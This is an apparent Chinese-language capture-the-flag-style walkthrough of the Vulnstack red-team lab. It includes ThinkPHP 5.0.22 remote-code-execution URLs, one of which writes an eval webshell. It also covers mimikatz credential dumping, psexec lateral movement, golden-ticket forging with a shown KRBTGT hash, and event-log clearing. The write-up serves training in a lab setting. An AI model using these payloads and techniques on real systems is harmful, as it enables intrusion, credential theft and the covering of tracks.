ATT&CK实战系列——红队实战(五)

一、环境配置

vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

虚拟机密码

win7
sun\heart 123.com
sun\Administrator dc123.com
Win7双网卡模拟内外网
2008
sun\admin 2020.com

网络环境配置如下:
ATT&CK实战系列——红队实战(五)_第1张图片

登陆更改一下密码
ATT&CK实战系列——红队实战(五)_第2张图片
把phpstudy开启,然后记住这里一定要把网卡配置到相应的位置
ATT&CK实战系列——红队实战(五)_第3张图片ATT&CK实战系列——红队实战(五)_第4张图片
网络环境如下:
ATT&CK实战系列——红队实战(五)_第5张图片

二、外网打点

使用nmap对外网ip段进行信息收集

nmap -sV 192.168.135.150

ATT&CK实战系列——红队实战(五)_第6张图片

有个web站点80、3306 mysql,就先从web站点下手

ThinkPHP 5.0.22 任意命令执行getshell

ATT&CK实战系列——红队实战(五)_第7张图片

ATT&CK实战系列——红队实战(五)_第8张图片

payload:

1.利用system函数远程命令执行

http://localhost:9096/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami


2.通过phpinfo函数写出phpinfo()的信息
http://localhost:9096/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


3.写入shell:
http://localhost:9096/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

或者http://localhost:9096/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=

打了一波发现是administrator权限

http://192.168.138.128/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

ATT&CK实战系列——红队实战(五)_第9张图片

这里就用工具getshell不那么麻烦了,内个蚁剑的编码器好像有点问题

ATT&CK实战系列——红队实战(五)_第10张图片

ATT&CK实战系列——红队实战(五)_第11张图片

我听说还有~师傅们留下的webshell在里面嗷
ATT&CK实战系列——红队实战(五)_第12张图片

ATT&CK实战系列——红队实战(五)_第13张图片

直接下载文件得到密码MD5解密
ATT&CK实战系列——红队实战(五)_第14张图片
ATT&CK实战系列——红队实战(五)_第15张图片
ATT&CK实战系列——红队实战(五)_第16张图片

我是一个好人果断把大马删除掉,然后植入一个哥斯拉的shell搞

mysql弱口令

找到TP5连接数据库的文件
ATT&CK实战系列——红队实战(五)_第17张图片

猜测账号密码都是root
ATT&CK实战系列——红队实战(五)_第18张图片
ATT&CK实战系列——红队实战(五)_第19张图片

三、内网渗透

上线CS

ATT&CK实战系列——红队实战(五)_第20张图片

权限提升

ATT&CK实战系列——红队实战(五)_第21张图片

信息收集

ipconfig /all #定位域控

ATT&CK实战系列——红队实战(五)_第22张图片
ATT&CK实战系列——红队实战(五)_第23张图片

Ladon 192.168.138.0/24 OnlinePC  # 多协议探测存活主机(IP、机器名、MAC地址、制造商)
Ladon 192.168.138.0/24 OsScan #多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)

ATT&CK实战系列——红队实战(五)_第24张图片
ATT&CK实战系列——红队实战(五)_第25张图片

mimikatz

获取用户密码已经NTLM、SID值
ATT&CK实战系列——红队实战(五)_第26张图片

四、横向移动

直接用EW做代理

./ew_for_Win.exe -s ssocksd -l 8888

运行被防火墙拦截了,好家伙果断关闭防火墙
ATT&CK实战系列——红队实战(五)_第27张图片

fscan扫描

ATT&CK实战系列——红队实战(五)_第28张图片
ATT&CK实战系列——红队实战(五)_第29张图片

MS17-010

扫描发现居然有MS17-010在win7上,虽然已经拿下这台机器了但还是试试
ATT&CK实战系列——红队实战(五)_第30张图片
ATT&CK实战系列——红队实战(五)_第31张图片

Psexec 横向拿下域控

SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。

ATT&CK实战系列——红队实战(五)_第32张图片

psexec 传递
psexec 是微软 pstools 工具包中最常用的一个工具,也是在内网渗透中的免杀渗透利器。psexec 能够在命令行下在对方没有开启 telnet 服务的时候返回一个半交互的命令行,像 telnet 客户端一样。原理是基于IPC共享,所以要目标打开 445 端口。另外在启动这个 psexec 建立连接之后对方机器上会被安装一个服务。

获取凭据后对目标网段进行端口存活探测,因为是 psexec 传递登录,这里仅需探测445端口

命令:portscan ip网段 端口 扫描协议(arp、icmp、none) 线程
例如:portscan 192.168.138.0/24 445 arp 200

ATT&CK实战系列——红队实战(五)_第33张图片
ATT&CK实战系列——红队实战(五)_第34张图片
ATT&CK实战系列——红队实战(五)_第35张图片
ATT&CK实战系列——红队实战(五)_第36张图片
ATT&CK实战系列——红队实战(五)_第37张图片

黄金票据

在域控获得KRBTGT账户NTLM密码哈希和SID
ATT&CK实战系列——红队实战(五)_第38张图片
ATT&CK实战系列——红队实战(五)_第39张图片
ATT&CK实战系列——红队实战(五)_第40张图片

黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。

黄金票据的条件要求:

1.域名称

2.域的SID值

3.域的KRBTGT账户NTLM密码哈希

4.伪造用户名

伪造域的用户名:len
域的名称:SUN
域的SID:S-1-5-21-3388020223-1982701712-4030140183-1110
域的KRBTGT账户NTLM密码哈希:65dc23a67f31503698981f2665f9d858

黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。

WEB机 Administrator 权限机器->右键->Access->Golden Ticket
ATT&CK实战系列——红队实战(五)_第41张图片
ATT&CK实战系列——红队实战(五)_第42张图片
ATT&CK实战系列——红队实战(五)_第43张图片

痕迹清理

windows

1.查看事件日志
run event_manager -i
2.删除事件日志
run event_manager -c
3.clearv命令清除目标系统的事件日志。

ATT&CK实战系列——红队实战(五)_第44张图片

参考的大佬们博客:https://blog.csdn.net/qq_38626043/article/details/119141146
本文仅作靶场实战教程,禁止将本文演示的技术方法用于非法活动,违者后果自负。

你可能感兴趣的